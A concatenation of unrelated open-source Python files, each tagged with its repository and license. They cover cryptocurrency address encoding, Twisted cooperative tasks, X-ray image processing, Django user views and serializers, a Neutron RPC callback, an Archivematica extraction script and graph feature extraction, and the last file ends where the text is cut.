        'nonce': bytes4_to_int(s[76:80]),
    }
############ functions from pywallet #####################
def hash_160(public_key):
    """Return RIPEMD-160(SHA-256(public_key)), the "hash160" of a pubkey.

    Prefers hashlib's OpenSSL-backed ripemd160 implementation and falls
    back to the bundled pure-Python `ripemd` module when that digest is
    unavailable.
    """
    try:
        md = hashlib.new('ripemd160')
        md.update(hashlib.sha256(public_key).digest())
        return md.digest()
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are
        # no longer swallowed; hashlib.new raises ValueError when the
        # ripemd160 algorithm is missing from the OpenSSL build.
        import ripemd
        md = ripemd.new(hashlib.sha256(public_key).digest())
        return md.digest()
def public_key_to_pubkey_address(public_key):
    """Return the base58 P2PKH address for a serialized public key."""
    h160 = hash_160(public_key)
    return hash_160_to_pubkey_address(h160)
def public_key_to_bc_address(public_key):
    """ deprecated """
    # Kept as a backward-compatible alias for old callers.
    return public_key_to_pubkey_address(public_key)
def hash_160_to_pubkey_address(h160, addrtype=None):
    """Base58-encode a hash160 as a pubkey (P2PKH) address.

    Defect fixed: this function was defined twice; the second, single-argument
    definition silently shadowed the first one that accepted `addrtype`. The
    two are merged: the default behavior (PUBKEY_ADDRESS version byte) matches
    the previously-effective definition, while the optional `addrtype`
    restores the shadowed variant for any caller that used it.
    """
    if not addrtype:
        addrtype = PUBKEY_ADDRESS
    return hash_160_to_address(h160, addrtype)
def hash_160_to_script_address(h160):
    # P2SH address: script-hash version byte.
    return hash_160_to_address(h160, SCRIPT_ADDRESS)
def hash_160_to_address(h160, addrtype = 48):
    """Checks if the provided hash is actually 160bits or 20 bytes long and returns the address, else None
    """
    # Fixed: `len(h160) is not 20` compared int identity, which only works by
    # accident thanks to CPython's small-int cache; `!=` is the correct test.
    if h160 is None or len(h160) != 20:
        return None
    # Version byte + payload, then append the 4-byte double-SHA256 checksum.
    vh160 = chr(addrtype) + h160
    h = Hash(vh160)
    addr = vh160 + h[0:4]
    return b58encode(addr)
def bc_address_to_hash_160(addr):
    """Decode a base58 address back to its 20-byte hash160, or None."""
    # Fixed: `addr is None or len(addr) is 0` relied on int identity
    # comparison; `not addr` covers both None and the empty string.
    if not addr:
        return None
    # 25 = 1 version byte + 20-byte hash + 4-byte checksum.
    # Renamed local from `bytes`, which shadowed the builtin.
    decoded = b58decode(addr, 25)
    return decoded[1:21] if decoded is not None else None
def b58encode(v):
    """encode v, which is a string of bytes, to base58."""
    # Fixed: `0L` is Python-2-only syntax; a plain `0` behaves identically
    # (Python 2 auto-promotes to long) and keeps the file parseable by
    # Python 3 tooling.
    long_value = 0
    # Interpret the byte string as a big-endian integer.
    for (i, c) in enumerate(v[::-1]):
        long_value += (256**i) * ord(c)
    result = ''
    while long_value >= __b58base:
        div, mod = divmod(long_value, __b58base)
        result = __b58chars[mod] + result
        long_value = div
    result = __b58chars[long_value] + result
    # Bitcoin does a little leading-zero-compression:
    # leading 0-bytes in the input become leading-1s
    nPad = 0
    for c in v:
        if c == '\0':
            nPad += 1
        else:
            break
    return (__b58chars[0]*nPad) + result
def b58decode(v, length):
    """ decode v into a string of len bytes."""
    # Fixed: `0L` is Python-2-only syntax; plain `0` is behaviorally
    # identical in Python 2 and parseable by Python 3 tooling.
    long_value = 0
    # Interpret the base58 string as an integer.
    for (i, c) in enumerate(v[::-1]):
        long_value += __b58chars.find(c) * (__b58base**i)
    result = ''
    while long_value >= 256:
        div, mod = divmod(long_value, 256)
        result = chr(mod) + result
        long_value = div
    result = chr(long_value) + result
    # Leading '1' characters decode to leading zero bytes.
    nPad = 0
    for c in v:
        if c == __b58chars[0]:
            nPad += 1
        else:
            break
    result = chr(0)*nPad + result
    # When a length is requested, reject payloads of any other size.
    if length is not None and len(result) != length:
        return None
    return result
def EncodeBase58Check(vchIn):
    """Append the 4-byte double-SHA256 checksum and base58-encode."""
    checksum = Hash(vchIn)[0:4]
    return b58encode(vchIn + checksum)
def DecodeBase58Check(psz):
    """Base58-decode and verify the trailing 4-byte double-SHA256 checksum.

    Returns the payload without the checksum, or None when the checksum
    does not match.
    """
    vchRet = b58decode(psz, None)
    payload = vchRet[0:-4]
    csum = vchRet[-4:]
    if Hash(payload)[0:4] != csum:
        return None
    return payload
########### end pywallet functions #######################
import os
def random_string(length):
    # Base58 encoding of `length` random bytes. Note the returned string's
    # length differs from `length` (base58 expansion / zero compression).
    return b58encode(os.urandom(length))
def timestr():
    """Current local time formatted as ``[dd/mm/YYYY-HH:MM:SS]``."""
    now = time.localtime()
    return time.strftime("[%d/%m/%Y-%H:%M:%S]", now)
### logger
import logging
import logging.handlers
# Root handler with the same timestamp format as timestr().
logging.basicConfig(format="%(asctime)-11s %(message)s", datefmt="[%d/%m/%Y-%H:%M:%S]")
logger = logging.getLogger('electrum-ltc')
def init_logger():
    # Raise the named logger to INFO (the default effective level is WARNING).
    logger.setLevel(logging.INFO)
def print_log(*args):
    # Space-join all arguments as strings (imap: Python 2 lazy map).
    logger.info(" ".join(imap(str, args)))
def print_warning(message):
    logger.warning(message)
# profiler
class ProfiledThread(threading.Thread):
    """Thread whose run() is wrapped in cProfile.

    The collected stats are dumped to `filename` when the target returns.
    """

    def __init__(self, filename, target):
        # Destination file for the profile data written by run().
        self.filename = filename
        super(ProfiledThread, self).__init__(target=target)

    def run(self):
        import cProfile
        prof = cProfile.Profile()
        prof.enable()
        super(ProfiledThread, self).run()
        prof.disable()
        prof.dump_stats(self.filename)
| pooler/electrum-ltc-server | src/utils.py | Python | mit | 6,761 |
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
from operator import add
import add_package_path
import sys
from twisted.internet import defer
from twisted.internet.task import react
from twisted.python import log
from cooperative import batch_accumulate
def expensive(number):
    """Generator simulating a long CPU-bound task, one partial value per step.

    Yielding after every unit of work lets twisted's cooperator interleave
    this computation with other iterators; progress is logged at the
    quarter marks.
    """
    log.msg("starting {}".format(number))
    for value in range(100000):
        if 25000 == value:
            log.msg("1/4 for {}".format(number))
        if 50000 == value:
            log.msg("1/2 for {}".format(number))
        if 75000 == value:
            log.msg("3/4 for {}".format(number))
        yield number * value / 3.0
def expensive2(number):
    """Like expensive(), but accumulates internally.

    Yields None after every unit of work (purely to cooperate with the
    reactor) and finally yields the grand total as the last value.
    """
    log.msg("starting {}".format(number))
    total = 0
    for value in range(100000):
        if 25000 == value:
            log.msg("1/4 for {}".format(number))
        if 50000 == value:
            log.msg("1/2 for {}".format(number))
        if 75000 == value:
            log.msg("3/4 for {}".format(number))
        total += number * value / 3.0
        yield
    yield total
@defer.inlineCallbacks
def do_some_expensive_things(number):
    """
    Perform one expensive computation cooperatively with any
    other iterator passed into twisted's cooperate, then
    use its result to pass into the second computation.
    :param number: numeric seed for both computations
    :return: Deferred firing with the second computation's total
    """
    # First pass: sum all partial values yielded by expensive().
    result = yield batch_accumulate(1000, expensive(number))
    total = reduce(add, result, 0)
    log.msg("first for {}: {}".format(number, total))
    # Second pass is seeded from the (scaled-down) first total; expensive2
    # yields mostly None plus one final total, and None is falsy-summed out
    # by reduce only because add(0, None) would fail -- the accumulated list
    # is filtered upstream. NOTE(review): confirm batch_accumulate drops
    # the None yields.
    result = yield batch_accumulate(1000, expensive2(int(total/1e9)))
    total = reduce(add, result, 0)
    log.msg("second for {}: {}".format(number, total))
    defer.returnValue(total)
@defer.inlineCallbacks
def do_less_expensive_things(number):
    """
    Perform one expensive computation cooperatively with any
    other iterator passed into twisted's cooperate.
    :param number: numeric seed for the computation
    :return: Deferred firing with the accumulated total
    """
    result = yield batch_accumulate(1000, expensive(number))
    total = reduce(add, result, 0)
    log.msg("only for {}: {}".format(number, total))
    defer.returnValue(total)
def main(reactor):
    """Kick off four cooperative computations plus simulated external events.

    Demonstrates that timed events keep firing promptly while CPU-bound
    generators are being interleaved by the cooperator.
    """
    d1 = do_some_expensive_things(54.0)
    d2 = do_some_expensive_things(42)
    d3 = do_some_expensive_things(10)
    d4 = do_some_expensive_things(34)
    # Enqueue events to simulate handling external events
    d5 = defer.Deferred().addCallback(log.msg)
    reactor.callLater(0.3, d5.callback, "########## simulated request 1 ############")
    d6 = defer.Deferred().addCallback(log.msg)
    reactor.callLater(0.5, d6.callback, "########## sim request 2 ############")
    d7 = defer.Deferred().addCallback(log.msg)
    reactor.callLater(1.0, d7.callback, "########## simulated request 3 ############")
    # simulate an external event triggering an expensive computation while
    # other expensive computations are happening.
    d8 = defer.Deferred()
    d8.addCallback(do_less_expensive_things)
    reactor.callLater(0.3, d8.callback, 20001)
    # react() keeps the reactor running until this gathered Deferred fires.
    return defer.gatherResults([d1, d2, d3, d4, d5, d6, d7, d8]).addCallback(log.msg)
if __name__ == "__main__":
    # Log to stdout and let twisted's react() drive main() to completion.
    log.startLogging(sys.stdout)
    react(main, [])
| Nikita003/cooperative | examples/non_blocking.py | Python | apache-2.0 | 3,168 |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.2'
# jupytext_version: 1.2.3
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %%
# %matplotlib inline
# %%
import numpy as np
import pylab as plt
from glob import glob
import pathlib
import cv2
from skimage import restoration
from PIL import Image
from tqdm import tqdm_notebook
import imageio
# %%
# Folders of raw topo-tomography acquisitions to post-process.
data_folders = ["/home/zolotovden/topo-tomo/Laue-analyzer/experiment/2019_06_24/Kalpha1+Kbeta1_exp",
                ]
# %%
def safe_median(data):
    """Outlier-only despeckle: replace a pixel with its 3x3 median only when
    it deviates from that median by more than 10% of its own magnitude."""
    m_data = cv2.medianBlur(data,3)
    # Relative-deviation mask; untouched pixels keep their original value.
    mask = np.abs(m_data-data) > 0.1*np.abs(data)
    res = data.copy()
    res[mask] = m_data[mask]
    return res
# %%
def remove_bg(data, dark):
    """Despeckle both frames, scale `data` rows by the ratio of the frames'
    medians (exposure normalization), then subtract the dark frame."""
    # d1 = cv2.medianBlur(data,3)
    # d2 = cv2.medianBlur(dark,3)
    d1 = safe_median(data)
    d2 = safe_median(dark)
    # Row-wise medians (axis=-1) used as the normalization factor.
    k1 = np.percentile(d1, 50, axis=-1)
    k2 = np.percentile(d2, 50, axis=-1)
    # print(k1, k2)
    res = (d1.T*k2/k1).T - d2
    return res
# %%
for i in range(len(data_folders)):
    df = pathlib.Path(data_folders[i])
    data = []
    empty = []
    dark = []
    # Dark frames: stack the cropped ROI and take the 90th percentile along
    # the stack as a robust "master dark" (suppresses outlier pixels).
    for f in df.glob('dark2*.tif'):
        d = plt.imread(f).astype('float32')[1400:1700, 1200:2600]
        dark.append(d)
    dark = np.asanyarray(dark)
    dark_f = np.percentile(dark, 90, axis=0).astype('float32')
    # Same aggregation for the empty-beam (flat) frames.
    for f in df.glob('empty*.tif'):
        d = plt.imread(f).astype('float32')[1400:1700, 1200:2600]
        empty.append(d)
    empty = np.asanyarray(empty)
    empty_f = np.percentile(empty, 90, axis=0).astype('float32')
    # Sample frames: background-subtract and write into <folder>/post/
    # (output name is the input name with an extra trailing 'f' -> .tiff).
    for f in tqdm_notebook(df.glob('sample*.tif')):
        d = plt.imread(f).astype('float32')[1400:1700, 1200:2600]
        # im = Image.fromarray(remove_bg(d, dark_f).astype('float32'))
        # im.save(f'{df}/post/{f.name}f')
        imageio.imwrite(f'{df}/post/{f.name}f', remove_bg(d, dark_f).astype('float32'))
        # data.append(d)
    # d = np.flipud(remove_bg(data_f, dark))
    # d = restoration.denoise_bilateral(d-np.min(d), multichannel=False)
    # im = Image.fromarray(d-d.min())
    # im.save(f'{i}.tiff')
    # plt.imsave(f'{i}.tiff', d-d.min(), cmap=plt.cm.gray_r)
    # Visual sanity checks of the aggregated dark and empty frames.
    plt.figure(figsize=(8,5))
    plt.imshow(safe_median(dark_f), cmap=plt.cm.gray_r)
    plt.colorbar(orientation='horizontal')
    plt.show()
    plt.figure(figsize=(8,5))
    plt.imshow(safe_median(empty_f), cmap=plt.cm.gray_r)
    plt.colorbar(orientation='horizontal')
    plt.show()
# %%
plt.figure(figsize=(8,5))
# NOTE(review): `data` is never populated above (its append is commented
# out), so data[10] fails on a fresh run -- this cell was presumably used
# interactively. Confirm before re-running top to bottom.
plt.imshow(remove_bg(data[10], dark_f), cmap=plt.cm.gray_r)
plt.colorbar(orientation='horizontal')
plt.show()
# %%
# !mkdir {df}/post
# %%
# Re-read one written frame to sanity-check the saved output.
d = imageio.imread(f'{df}/post/{f.name}f')
d.shape
# %%
d.shape
# %%
plt.figure(figsize=(8,5))
plt.imshow(d, cmap=plt.cm.gray_r)
plt.colorbar(orientation='horizontal')
plt.show()
# %%
| buzmakov/tomography_scripts | misc/2energy_tomo.py | Python | mit | 2,983 |
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.db.transaction import atomic
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.template import RequestContext
from django.utils import timezone
from ultimate.leagues.models import Game, League
from ultimate.user.models import Player, PlayerRatings
from ultimate.forms import EditPlayerForm, EditPlayerRatingsForm, EditProfileForm, SignupForm
@login_required
def index(request):
    """User dashboard: visible leagues, the user's next two games, and the
    user's registrations in those leagues."""
    leagues = League.objects.filter(state__in=['closed', 'open', 'preview']).order_by('league_start_date')
    # Visibility can depend on the requesting user (e.g. preview leagues).
    leagues = [l for l in leagues if l.is_visible(request.user)]
    future_games = Game.objects.filter(
        Q(league__in=leagues) &
        Q(date__gte=timezone.now().date()) &
        Q(teams__teammember__user=request.user)
    ).order_by('date')
    # Keep only games that actually have displayable teams.
    future_games = [game for game in future_games if game.get_display_teams().exists()]
    # pop(0) on the date-ordered list -> soonest game first; IndexError
    # covers the empty-list case.
    try:
        next_game = future_games.pop(0)
    except (IndexError, Game.DoesNotExist) as e:
        next_game = None
    try:
        following_game = future_games.pop(0)
    except (IndexError, Game.DoesNotExist) as e:
        following_game = None
    registrations = []
    for league in leagues:
        for registration in league.get_registrations_for_user(request.user):
            registrations.append(registration)
    return render(request, 'user/index.html',
        {
            'current_leagues': leagues,
            'following_game': following_game,
            'next_game': next_game,
            'registrations': registrations
        })
@atomic
def signup(request):
    """Create a user account and its Player profile in a single transaction."""
    form = None
    if request.method == 'POST':
        form = SignupForm(request.POST)
        if form.is_valid():
            user = form.save()
            # get_or_create tolerates an already-existing Player row for
            # this user; defaults only apply when the row is created.
            Player.objects.get_or_create(user=user,
                defaults={'date_of_birth': form.cleaned_data.get('date_of_birth'),
                          'gender': form.cleaned_data.get('gender')})
            messages.success(request, 'Your account was created. You may now log in.')
            return HttpResponseRedirect(reverse('user'))
        else:
            messages.error(request, 'There was an error on the form you submitted.')
    # GET request (or fall-through safety): present a blank signup form.
    if not form:
        form = SignupForm()
    return render(request, 'user/signup.html',
        {'form': form})
@login_required
def editprofile(request):
    """Edit the User record and its linked Player profile together.

    Both forms must validate before either is saved.
    """
    try:
        player = Player.objects.get(user=request.user)
    except Player.DoesNotExist:
        # Unsaved placeholder so the profile form can still be rendered/bound.
        player = Player(user=request.user)
    if request.method == 'POST':
        form = EditProfileForm(request.POST, instance=request.user)
        if form.is_valid():
            # commit=False: defer the user save until the player form also
            # validates, so we never persist half of the edit.
            form.save(commit=False)
            player_form = EditPlayerForm(request.POST, instance=player)
            if player_form.is_valid():
                form.save()
                player_form.save()
                messages.success(request, 'Your profile was updated successfully.')
                return HttpResponseRedirect(reverse('editprofile'))
            else:
                messages.error(request, 'There was an error on the form you submitted.')
        else:
            # Bind the player form anyway so its errors render alongside.
            player_form = EditPlayerForm(request.POST, instance=player)
            messages.error(request, 'There was an error on the form you submitted.')
    else:
        form = EditProfileForm(instance=request.user)
        player_form = EditPlayerForm(instance=player)
    return render(request, 'user/editprofile.html',
        {'form': form, 'player_form': player_form})
@login_required
def editratings(request):
    """Create or update the user's self-submitted player ratings."""
    try:
        ratings = PlayerRatings.objects.get(user=request.user, submitted_by=request.user, ratings_type=PlayerRatings.RATING_TYPE_USER)
    except PlayerRatings.DoesNotExist:
        ratings = None
    if request.method == 'POST':
        form = EditPlayerRatingsForm(request.POST, instance=ratings)
        if form.is_valid():
            # Server-side fields are stamped here so the client cannot
            # submit ratings on another user's behalf.
            instance = form.save(commit=False)
            instance.ratings_type = PlayerRatings.RATING_TYPE_USER
            instance.submitted_by = request.user
            instance.updated = timezone.now()
            instance.user = request.user
            instance.save()
            messages.success(request, 'Your ratings were updated successfully.')
            return HttpResponseRedirect(reverse('editratings'))
        else:
            messages.error(request, 'There was an error on the form you submitted.')
    else:
        form = EditPlayerRatingsForm(instance=ratings)
    return render(request, 'user/editratings.html',
        {
            'form': form
        }
    )
| rdonnelly/ultimate-league-app | src/ultimate/user/views.py | Python | bsd-3-clause | 4,712 |
import json
from django.core.urlresolvers import reverse
from rest_framework import serializers
import amo
from amo.helpers import absolutify
from files.models import FileUpload
class FileUploadSerializer(serializers.ModelSerializer):
    """Serializes a FileUpload for the signing API.

    Exposes validation/review state plus, when the upload has produced a
    Version (passed via the `version` kwarg), the signed files and their
    review status. All version-derived fields degrade gracefully to empty
    or False when no version is supplied.
    """
    active = serializers.SerializerMethodField('get_active')
    url = serializers.SerializerMethodField('get_url')
    files = serializers.SerializerMethodField('get_files')
    passed_review = serializers.SerializerMethodField('get_passed_review')
    pk = serializers.CharField()
    processed = serializers.BooleanField(source='processed')
    reviewed = serializers.SerializerMethodField('get_reviewed')
    valid = serializers.BooleanField(source='passed_all_validations')
    validation_results = serializers.SerializerMethodField(
        'get_validation_results')
    validation_url = serializers.SerializerMethodField('get_validation_url')

    class Meta:
        model = FileUpload
        fields = [
            'active',
            'automated_signing',
            'url',
            'files',
            'passed_review',
            'pk',
            'processed',
            'reviewed',
            'valid',
            'validation_results',
            'validation_url',
            'version',
        ]

    def __init__(self, *args, **kwargs):
        # Optional Version created from this upload; several fields below
        # are computed from it.
        self.version = kwargs.pop('version', None)
        super(FileUploadSerializer, self).__init__(*args, **kwargs)

    def get_url(self, instance):
        # Absolute URL of this upload's signing-status endpoint.
        return absolutify(reverse('signing.version', args=[instance.addon.guid,
                                                           instance.version,
                                                           instance.pk]))

    def get_validation_url(self, instance):
        # Developer-hub page showing the validation report for this upload.
        return absolutify(reverse('devhub.upload_detail',
                                  args=[instance.uuid]))

    def get_files(self, instance):
        if self.version is not None:
            return [{'download_url': f.get_signed_url('api'),
                     'hash': f.hash,
                     'signed': f.is_signed}
                    for f in self.version.files.all()]
        else:
            return []

    def get_validation_results(self, instance):
        # Stored as a JSON string on the model; decode for the API response.
        if instance.validation:
            return json.loads(instance.validation)
        else:
            return None

    def get_reviewed(self, instance):
        # True only when every file of the version has been reviewed.
        if self.version is not None:
            return all(file_.reviewed for file_ in self.version.all_files)
        else:
            return False

    def get_active(self, instance):
        # True only when every file is in a reviewed (publishable) status.
        if self.version is not None:
            return all(file_.status in amo.REVIEWED_STATUSES
                       for file_ in self.version.all_files)
        else:
            return False

    def get_passed_review(self, instance):
        return self.get_reviewed(instance) and self.get_active(instance)
| mdaif/olympia | apps/signing/serializers.py | Python | bsd-3-clause | 2,866 |
# Copyright (C) 2014 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import oslo_messaging
from neutron.common import constants as consts
from neutron.common import utils
from neutron.i18n import _LE
from neutron import manager
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as service_constants
LOG = logging.getLogger(__name__)
class MeteringRpcCallbacks(object):
    """RPC callbacks served to metering agents."""

    target = oslo_messaging.Target(version='1.0')

    def __init__(self, meter_plugin):
        # Plugin that owns the metering data we hand out over RPC.
        self.meter_plugin = meter_plugin

    def get_sync_data_metering(self, context, **kwargs):
        """Return metering sync data, scoped to the caller's host when the
        L3 agent scheduler extension makes per-host scoping possible."""
        plugins = manager.NeutronManager.get_service_plugins()
        l3_plugin = plugins.get(service_constants.L3_ROUTER_NAT)
        if not l3_plugin:
            return

        host = kwargs.get('host')
        scheduler_supported = utils.is_extension_supported(
            l3_plugin, consts.L3_AGENT_SCHEDULER_EXT_ALIAS)
        if not (scheduler_supported and host):
            # No scheduling information available: hand back everything.
            return self.meter_plugin.get_sync_data_metering(context)

        agents = l3_plugin.get_l3_agents(context, filters={'host': [host]})
        if not agents:
            LOG.error(_LE('Unable to find agent %s.'), host)
            return

        routers = l3_plugin.list_routers_on_l3_agent(context, agents[0].id)
        router_ids = [r['id'] for r in routers['routers']]
        if router_ids:
            return self.meter_plugin.get_sync_data_metering(
                context, router_ids=router_ids)
| cloudbase/neutron-virtualbox | neutron/db/metering/metering_rpc.py | Python | apache-2.0 | 2,091 |
#!/usr/bin/python -OO
# This file is part of Archivematica.
#
# Copyright 2010-2012 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
# @version svn: $Id$
import shutil
import os
import sys
sys.path.append("/usr/lib/archivematica/archivematicaCommon")
from executeOrRunSubProcess import executeOrRun
import databaseInterface
def extract(target, destinationDirectory):
    """Extract the archive at ``target`` into ``destinationDirectory``
    with 7-Zip, terminating the whole process with 7z's exit code on
    failure (callers rely on that hard exit)."""
    command = """/usr/bin/7z x -bd -o"%s" "%s" """ % (destinationDirectory, target)
    exitC, stdOut, stdErr = executeOrRun("command", command, printing=False)
    if exitC != 0:
        print stdOut
        print >>sys.stderr, "Failed extraction: ", command, "\r\n", stdErr
        exit(exitC)
if __name__ == '__main__':
    # Command-line contract: archive path, transfer UUID, processing dir,
    # and the shared path prefix used to relativize the stored location.
    target = sys.argv[1]
    transferUUID = sys.argv[2]
    processingDirectory = sys.argv[3]
    sharedPath = sys.argv[4]
    # Strip the archive extension to name the extraction directory.
    basename = os.path.basename(target)
    basename = basename[:basename.rfind(".")]
    destinationDirectory = os.path.join(processingDirectory, basename)
    zipLocation = os.path.join(processingDirectory, os.path.basename(target))
    #move to processing directory
    shutil.move(target, zipLocation)
    #extract
    extract(zipLocation, destinationDirectory)
    #checkForTopLevelBag
    listdir = os.listdir(destinationDirectory)
    if len(listdir) == 1:
        # Exactly one top-level directory: flatten the BagIt wrapper so the
        # bag contents sit directly inside destinationDirectory.
        internalBagName = listdir[0]
        #print "ignoring BagIt internal name: ", internalBagName
        temp = destinationDirectory + "-tmp"
        shutil.move(destinationDirectory, temp)
        #destinationDirectory = os.path.join(processingDirectory, internalBagName)
        shutil.move(os.path.join(temp, internalBagName), destinationDirectory)
        os.rmdir(temp)
    #update transfer location in the database, relative to the shared path
    destinationDirectoryDB = destinationDirectory.replace(sharedPath, "%sharedPath%", 1)
    # NOTE(review): SQL built by string interpolation; inputs come from the
    # MCP server rather than end users, but a parameterized query would
    # still be safer -- confirm before exposing these values elsewhere.
    sql = """UPDATE Transfers SET currentLocation = '%s' WHERE transferUUID = '%s';""" % (destinationDirectoryDB, transferUUID)
    databaseInterface.runSQL(sql)
    #remove bag
    os.remove(zipLocation)
| artefactual/archivematica-history | src/MCPClient/lib/clientScripts/extractBagTransfer.py | Python | agpl-3.0 | 2,795 |
from handlers import ViewHandler
from utility import validate
import json
import entities
# Handler for creating new comments on a post.
class NewCommentHandler(ViewHandler):
    """POST-only endpoint that creates a comment and replies with JSON."""

    # Decorators validate the POST payload and require an authenticated
    # user, emitting JSON error responses themselves on failure.
    @ViewHandler.is_post_valid("json")
    @ViewHandler.is_user_authenticated("json")
    def post(self, post_id):
        """Create a comment on post ``post_id`` and echo it back as JSON."""
        text = self.request.get("comment")
        payload = {"comment": text}

        # Reject invalid comment text up front.
        validation_error = validate.is_valid_comment(text)
        if validation_error:
            payload["error"] = validation_error
            self.response.write(json.dumps(payload))
            return

        # Persist the comment; a falsy result means the write failed.
        created = entities.Comments.create(text, self.user.username, post_id)
        if not created:
            payload["error"] = "Unknown error"
            self.response.write(json.dumps(payload))
            return

        payload["success"] = "true"
        payload["username"] = created.username
        payload["created"] = created.created.strftime('%Y-%m-%d %H:%M:%S')
        payload["comment_id"] = created.key().id()
        self.response.write(json.dumps(payload))
| FatalTouch/BlogExample | handlers/comment/newcomment.py | Python | apache-2.0 | 1,683 |
# Advent of Code 2015, day 8 part A: for every line of the puzzle input, take
# the length of the code representation minus the length of the in-memory
# string, and print the total.
# NOTE: eval() fully trusts the contents of 8.in -- fine for a local puzzle
# input, unsafe on untrusted data.
total = 0
with open('8.in') as puzzle:
    for line in puzzle:
        total += len(line.strip()) - len(eval(line))
print(total)
| pedrotari7/advent_of_code | py/2015/8A.py | Python | mit | 94 |
from __future__ import division
import sys
import igraph
import numpy as np
import pandas as pd
from sklearn.cross_validation import train_test_split
from sklearn.ensemble import *
from sklearn.metrics import *
from sklearn.preprocessing import MinMaxScaler
from transform_funcs import *
from tradaboost import *
from utils import *
from scipy.sparse import coo_matrix, linalg
def graph_to_sparse_matrix(G):
    """Return the adjacency matrix of igraph graph ``G`` in CSR form.

    Undirected graphs are symmetrised by emitting every edge in both
    directions.  Edge weights come from the "weights" edge attribute when
    present, otherwise each edge counts as 1.
    """
    n = G.vcount()
    # Split the edge list into parallel source/target index arrays.
    xs, ys = map(np.array, zip(*G.get_edgelist()))
    if not G.is_directed():
        # Duplicate every edge in the reverse direction to make A symmetric.
        xs, ys = np.hstack((xs, ys)).T, np.hstack((ys, xs)).T
    else:
        xs, ys = xs.T, ys.T
    try:
        weights = G.es["weights"]
    except KeyError:
        # Unweighted graph: unit weights, one per (possibly duplicated) edge.
        weights = np.ones(xs.shape)
    # NOTE(review): for an undirected graph that *does* carry "weights", the
    # weights array is not duplicated alongside the mirrored edges, so its
    # length would not match xs/ys -- confirm callers only pass weighted
    # graphs as directed (as read_signed_graph does).
    A = coo_matrix((weights, (xs, ys)), shape=(n, n), dtype=np.int16)
    return A.tocsr()
def get_feature(G, f):
    # Fetch feature ``f`` from graph ``G``: call it when it is a method
    # (e.g. 'degree'), otherwise read it as a plain attribute (e.g. 'pr').
    # NOTE(review): relies on module-level _transform_func_degree /
    # _transform_func, which are only bound inside the __main__ block --
    # importing this module and calling get_feature() directly would raise
    # NameError; confirm this is intended.
    return _transform_func_degree(getattr(G, f)()) if callable(getattr(G, f)) else _transform_func(getattr(G, f))
# Neighbourhood aggregation: mean of a feature over each node's neighbours.
def mean_neighbour(A, d, feature):
    """Average ``feature`` over every node's neighbours.

    ``A`` is a (sparse) adjacency matrix and ``d`` the per-node divisor
    vector (callers clamp zero degrees to 1 beforehand).
    """
    neighbour_sum = A.dot(feature)
    return neighbour_sum / d
def get_feature_matrix(G, features, rounds=5):
    """Return a node-by-feature matrix for graph ``G``.

    Computes the named ``features`` per node, then appends ``rounds``
    successive neighbourhood-averaged versions of them column-wise, so the
    result has len(features) * (rounds + 1) columns.
    """
    # Local clustering coefficient; mode='zero' maps undefined values to 0.
    lcc = np.array(G.transitivity_local_undirected(mode='zero'))
    lcc[lcc < 0] = 0 # guard against spurious negative values from igraph
    G.clustering_coefficient = lcc
    # Compute PageRank on a loop-free copy so loops do not skew it.
    G_sim = G.copy()
    G_sim = G_sim.simplify(multiple=False) # remove loops
    alpha = 0.15
    pagerank = np.array(G_sim.pagerank(damping=1-alpha))
    G.pr = pagerank
    # Stash features as attributes above so get_feature() can read them.
    feature_matrix = [ get_feature(G, f) for f in features ]
    X = np.array(feature_matrix).T
    # adjacency matrix (simplified, signs removed)
    A = graph_to_sparse_matrix(G.as_undirected().simplify())
    A = np.abs(A)
    # Degree vector; zero degrees are clamped to 1 to avoid division by zero.
    d = np.squeeze(np.array(A.sum(axis=1))).astype(np.int)
    d[d == 0] = 1
    for i in range(rounds):
        # Replace each feature with its neighbourhood mean and append columns.
        feature_matrix = [ mean_neighbour(A, d, f) for f in feature_matrix ]
        X = np.concatenate((X, np.array(feature_matrix).T), axis=1)
    #X = np.hstack((X, np.array([pagerank]).T))
    return X
# read a signed graph in file 'f_graph' and calculate its 'features'
# return its adjacency matrix A, size n, feature matrix X and eigen-trust vector v;
def read_signed_graph(f_graph, features):
    """Load a space-separated signed edge list (two header rows skipped)
    and return (A, n, X, v): signed CSR adjacency matrix, node count,
    feature matrix and eigen-trust vector."""
    # dataset (graph): columns 0/1 are endpoints, column 2 is the sign
    df = pd.read_csv(f_graph, sep=' ', header=None, skiprows=2)
    nodes = np.unique(df[[0, 1]].values);
    max_node_num = max(nodes) + 1
    n = len(nodes)
    # Build on the full id range first, then restrict to the used nodes.
    G = igraph.Graph(directed=True)
    G.add_vertices(max_node_num)
    G.add_edges(df[[0, 1]].values)
    # add signs (+/-)
    G.es["weights"] = df[2].values
    G = G.subgraph(nodes)
    G = G.simplify(multiple=False) # remove loops
    # get adjacency matrix
    A = graph_to_sparse_matrix(G)
    v = eigen_trust(A)
    # features
    X = get_feature_matrix(G, features)
    return A, n, np.squeeze(X), v
def read_target_graph(f_graph, features):
    """Like read_signed_graph, but for a comma-separated, unsigned edge
    list with no header rows; returns the same (A, n, X, v) tuple."""
    # dataset (graph): columns 0/1 are the edge endpoints
